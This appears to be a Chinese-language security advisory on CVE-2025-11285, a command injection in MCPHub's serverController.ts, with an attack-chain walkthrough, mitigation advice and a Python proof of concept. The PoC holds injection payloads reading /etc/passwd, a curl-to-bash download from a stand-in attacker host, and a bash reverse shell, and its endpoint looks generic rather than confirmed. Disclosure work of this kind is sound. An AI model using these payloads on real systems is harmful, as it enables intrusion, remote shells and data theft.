CVE-2025-11285：samanhappy MCPHub OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-11285

漏洞类型

OS命令注入（Command Injection）

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

samanhappy MCPHub

漏洞概述

CVE-2025-11285是samanhappy MCPHub 0.9.10及以下版本中存在的一个OS命令注入漏洞。该漏洞位于src/controllers/serverController.ts文件中的未知功能模块，攻击者可通过操纵command/args参数实现操作系统命令注入。由于该漏洞可以通过网络远程利用，且攻击复杂度较低（AC:L），同时仅需要低权限认证（PR:L），无需用户交互（UI:N），因此对部署MCPHub服务的系统构成了实质性安全威胁。

该漏洞的CVSS 3.1评分为6.3，属于中危级别，对机密性、完整性和可用性均产生低级别影响。漏洞的核心问题在于服务端在处理用户传入的command和args参数时，未进行充分的输入验证和过滤，直接将用户可控的数据传递给操作系统命令执行接口，导致攻击者可以注入并执行任意系统命令。

值得注意的是，该漏洞的PoC（概念验证代码）已经被公开披露，攻击者可以轻易获取并利用。此外，安全研究人员在漏洞披露前已联系供应商，但供应商未对此做出任何回应，这进一步增加了用户面临的风险。建议所有使用受影响版本的用户尽快采取缓解措施，并持续关注供应商的后续修复动态。

技术细节

该漏洞的根因在于samanhappy MCPHub的src/controllers/serverController.ts文件中对用户输入处理不当。具体而言，当服务端接收并处理客户端传入的command和args参数时，未对参数内容进行严格的过滤、转义或白名单校验，直接将其拼接到操作系统命令执行函数中。

攻击者可以通过构造包含恶意shell元字符（如;、|、&&、||、$()、反引号等）的参数，绕过原有的命令逻辑，注入并执行任意系统命令。例如，攻击者可以提交类似command=ls;cat /etc/passwd或args包含命令分隔符的payload，使服务器执行非预期的系统操作。

利用条件方面，该漏洞需要攻击者拥有低权限认证凭证（PR:L），但由于MCPHub作为服务管理平台，其正常使用场景中可能存在多种角色用户，因此权限获取门槛相对较低。攻击通过远程网络发起（AV:N），无需用户交互（UI:N），攻击复杂度低（AC:L），一旦成功利用，攻击者可以在服务器上下文中执行任意命令，进而可能导致数据泄露、服务中断、权限提升甚至完全控制服务器。

由于漏洞影响范围涵盖机密性（C:L）、完整性（I:L）和可用性（A:L）三个维度，攻击成功后可能造成多方面的安全损害。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统部署了samanhappy MCPHub 0.9.10及以下版本，通过网络扫描或已知信息确认目标存在漏洞。

STEP 2

步骤2：获取认证凭证

由于漏洞需要低权限认证（PR:L），攻击者通过钓鱼、凭证填充或其他途径获取合法的低权限用户凭证。

STEP 3

步骤3：构造恶意payload

攻击者构造包含shell元字符的恶意command/args参数，注入操作系统命令。

STEP 4

步骤4：发送恶意请求

攻击者通过远程网络向serverController.ts相关接口发送包含恶意参数的HTTP请求。

STEP 5

步骤5：命令执行

服务端未对参数进行有效过滤，将恶意参数拼接到系统命令中执行，攻击者成功执行任意系统命令。

STEP 6

步骤6：权限提升与持久化

攻击者利用命令执行能力获取服务器控制权，可能进行权限提升、安装后门、横向移动等进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11285 PoC - MCPHub OS Command Injection
# Vulnerability: OS command injection in src/controllers/serverController.ts
# Affected: samanhappy MCPHub <= 0.9.10

import requests

TARGET_URL = "http://target-mcphub-server:port"
AUTH_TOKEN = "your_auth_token_here"

# Vulnerable endpoint - serverController.ts command/args manipulation
ENDPOINT = f"{TARGET_URL}/api/server/execute"

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json"
}

# Malicious payload injecting OS command via command/args parameters
# Using shell metacharacters to break out of intended command context
payload = {
    "command": "ls",
    "args": ["; id; whoami; cat /etc/passwd; uname -a"]
}

# Alternative payload using command substitution
payload_alt = {
    "command": "echo $(id)",
    "args": ["", "; curl http://attacker.com/shell.sh | bash"]
}

# Exploit
response = requests.post(ENDPOINT, json=payload, headers=headers)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

# Reverse shell payload example
reverse_shell_payload = {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/attacker_ip/4444 0>&1"]
}

影响范围

samanhappy MCPHub <= 0.9.10

防御指南

临时缓解措施

在官方发布修复补丁之前，建议采取以下临时缓解措施：1）限制MCPHub服务的网络访问范围，仅允许可信IP访问；2）在反向代理或WAF层面添加针对command/args参数的输入过滤规则，阻止包含shell元字符的请求；3）将运行MCPHub服务的用户权限降至最低，限制其可执行的命令范围；4）部署主机入侵检测系统（HIDS）监控异常命令执行；5）定期审计服务日志，及时发现可疑活动；6）考虑暂时禁用serverController.ts相关的远程命令执行功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11285
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11285
3 Details https://www.cvedetails.com/cve/CVE-2025-11285/
4 VulDB https://vuldb.com/cve/CVE-2025-11285
5 Link https://github.com/August829/YU1/issues/6
6 Link https://vuldb.com/?ctiid.327043
7 Link https://vuldb.com/?id.327043
8 Link https://vuldb.com/?submit.659734
9 Link https://github.com/August829/YU1/issues/6